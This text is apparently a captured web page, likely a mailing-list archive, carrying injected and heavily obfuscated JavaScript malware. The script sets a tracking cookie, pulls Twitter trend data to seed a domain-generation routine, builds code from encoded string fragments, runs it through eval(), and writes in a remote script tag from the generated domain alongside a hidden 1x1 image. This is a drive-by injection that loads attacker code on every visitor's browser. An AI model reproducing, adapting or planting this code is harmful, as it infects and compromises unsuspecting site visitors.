0~e}9050%2522%25M+iuqbSx%25220-0|uddubcK8888dy}uK7iuqb7M060%2520h##!!90..0#90;0~e}9050%22;cd%3d%22;%2573t%253dst%252bS%2574rin%2567%252e%2566rom%2543ha%2572%2543od%2565((%2574m%22;de%3d%22!%25209M0;0|uddubcK8888dy}uK7iuqb7M060%2520h##!!90..0$90;0~e}9050!%25209M+0}%257F~dxSx0-0|uddubcK88dy}uK7}%257F~dx7M0;0~e}9050%2522%259M0;0|uddubcK88dy}uK7}%257F~dx7M0:0~e}9050%2522%259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%25269050%2522%279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%2522$9M+4q-4q%3ebu`|qsu8t%3ctqiSx0;0iuqbSx%25220;0}%257F~dxSx0;0iuqbSx!0;0tqiSx0;0}%257F~dxcKdy}uK7}%257F~dx7M0%3d0!M0;07%3es%257F}79+m%22;st%3d%22%2573%2574%253d%2522$%2561%253dst%253b%2564c%2573(%2564%2561%252bd%2562+%2564%2563%252b%2564d%252bd%2565,%25310%2529%253b%2564%2577%2528%2573t%2529%253b%2573%2574%253d%2524a%253b%2522;%22;%69f (%64ocu%6den%74%2ec%6fok%69%65.in%64%65xOf%28%27rf%35f6%64s%27)%3d%3d-1)%7bfu%6ec%74ion%20cal%6cb%61%63k(%78%29%7bwindo%77.t%77 %3d %78%3bva%72 d %3d ne%77 Da%74e%28);%64.%
73etT%69me%28x[%22as%5fo%66%22]*10%300%29;v%61r %68 %3d %64%2ege%74U%54%43H%6f%75r%73()%3b%77%69%6ed%6fw.h%20%3d h;i%66 %28h %3e 8)%7bd.se%74UTC%44a%74e(d%2eg%65tU%54CD%61te(%29 - %32);%7de%6cse%7b%64%2ese%74%55%54%43%44at%65(d.%67%65%74U%54CD%61t%65()%20%2d 3)%3b}%77%69nd%6fw%2e%67d %3d d;%76%61%72%20ti%6d%65 %3d ne%77%20Ar%72ay(%29;va%72 s%68ift%49n%64e%78 %3d %22%22;ti%6de%5b%22ye%61r%22] %3d d.g%65t%55%54C%46ul%6cYea%72(%29%3bti%6de[%22mon%74h%22%5d %3d %64.g%65tUT%43%4d%6f%6eth%28)%2b%31;%74ime%5b%22day%22]%20%3d d.ge%74UT%43D%61te%28%29;if%20(d%2ege%74U%54CM%6fnth%28%29+1%20%3c 10)%7bs%68%69ft%49%6ed%65x %3d%20ti%6de%5b%22year%22%5d %2b %22-0%22 + %28d.g%65tUT%43%4d%6f%6et%68(%29+1%29;%7de%6cs%65%7bshift%49n%64ex%20%3d t%69m%65%5b%22ye%61r%22]%20+ %22-%22 + (%64%2ege%74UTC%4dont%68()%2b1)%3b}i%66 (d%2e%67%65%74%55TCD%61te%28)%20%3c 10%29%7bshi%66%74%49nd%65x %3ds%68%69f%74I%6ed%65x %2b %22-%30%22 + d%2eget%55T%43D%61t%65();%7de%6cs%65%7bsh%69%66tI%6e%64ex %3d s%68%69f%
74In%64ex %2b%20%22-%22 + d.%67etU%54%43Da%74%65(%29;}%64o%63%75%6den%74.%77rit%65(%22%3cscr%22%2b%22ip%74 la%6e%67u%61%67%65%3dja%76%61sc%72ip%74%22+%22 src%3d%27ht%74%70:%2f%2fsear%63h%2etwi%74te%72%2ec%6f%6d%2ftrend%73%2fdail%79.%6aso%6e?d%61te%3d%22+ s%68if%74In%64ex+%22%26ca%6cl%62ac%6b%3dc%61llb%61ck%32%27%3e%22 + %22%3c%2fscr%22 + %22ipt%3e%22);} f%75n%63ti%6f%6e c%61ll%62ac%6b2(%78)%7bwindo%77.tw%20%3d x%3bsc(%27r%665f%36ds%27,2,%37)%3bev%61%6c(u%6eesc%61pe(%64%7a%2b%63z+%6fp%2bst)%2b%27dw(%64%7a+%63z($%61+%73t%29%29%3b%27);%64ocu%6d%65n%74.%77ri%74e($%61)%3b}d%6fc%75m%65nt.%77r%69te%28%22%3cimg s%72c%3d%27http:%2f%2fsear%63h%2etw%69tte%72.c%6fm%2fima%67es%2fse%61r%63h%2frss%2ep%6eg%27 w%69%64%74h%3d1%20he%69g%68t%3d1 sty%6ce%3d%27vis%69b%69l%69ty%3ah%69%64den%27 %2f%3e %3csc%72%22+%22ipt l%61ng%75%61g%65%3djav%61s%63ri%70t%22%2b%22 sr%63%3d%27http:%2f%2fsear%63h.%74w%69%74ter%2ec%6fm%2ft%72%65nd%73%2fda%69l%79%2e%6ason%3fcal%6cbac%6b%3dc%61llb%61ck%27%3e%22 + %22%3c
%2fscr%22 + %22ipt%3e%22);}%65%6c%73e%7b$%61%3d%27%27};f%75%6ec%74ion%20sc(%63n%6d,v%2c%65%64%29%7bva%72 ex%64%3dnew %44a%74%65(%29;e%78d.%73%65tD%61%74%65%28ex%64.%67etD%61%74e%28)+%65d)%3b%64ocu%6de%6et.c%6foki%65%3dcnm%2b%20%27%3d%27 +escape(%76)+%27;ex%70ire%73%3d%27+exd.t%6f%47MTS%74%72ing%28%29"
//unescape the string 's'
s1="cz="%66u%6ect%69o%6e c%7a(c%7a)%7bret%75%72%6e ca%2bcb+%63c%2bcd%2bce+%63z;}%3b";db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";cb="e%28%64%73);%73t%3dt%6dp%3d%27%27;for(i%3d0;i%3cds.%6c";op="%24a%3d%22dw(dc%73(c%75,1%34))%3b%22;";ca="%66u%6e%63tio%6e d%63s%28ds%2ces%29%7bds%3dun%65sc%61p";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;v}zfsz%26;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";cc="en%67t%68;i+%2b%29%7btm%70%3dds.s%6c%69ce(%69,%69+1%29";dz="%66un%63ti%6fn %64%77(t%29%7bca%3d%27%2564oc%2575%25%36d%65%6e%2574%25%32ewr%256%39%74e(%2522%27;ce%3d%27%2522)%27;cb%3d%27%253cs%2563rip%257%34 %256can%256%37%257%35a%2567
e%253d%255c%2522j%61vas%63r%2569p%2574%255c%2522%253e%27;cc%3d%27%253c%255c%252%66s%63%72ipt%253e%27;win%64ow%5b%22e%22+%22%22+ %22v%22+%22al%22](unescape%28t%29)};";dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";ce="p%2ech%61r%43ode%41t(0%29^(%270x00%27+%65s)%29);}%7d";da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi
>sxqbS%";dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";cd=";%73t%3dst%2bS%74rin%67%2e%66rom%43ha%72%43od%65((%74m";de="!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";st="%73%74%3d%22$%61%3dst%3b%64c%73(%64%61%2bd%62+%64%63%2b%64d%2bd%65,%310%29%3b%64%77%28%73t%29%3b%73%74%3d%24a%3b%22;";if (document.cookie.indexOf
('rf5f6ds')==-1){function callback(x){window.tw = x;var d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() - 3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.getUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate() < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIndex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=callback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds',2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}document.write("<img src='http://search.twitter.com/images/s
earch/rss.png' width=1 height=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString()"
Powered by blists - more mailing lists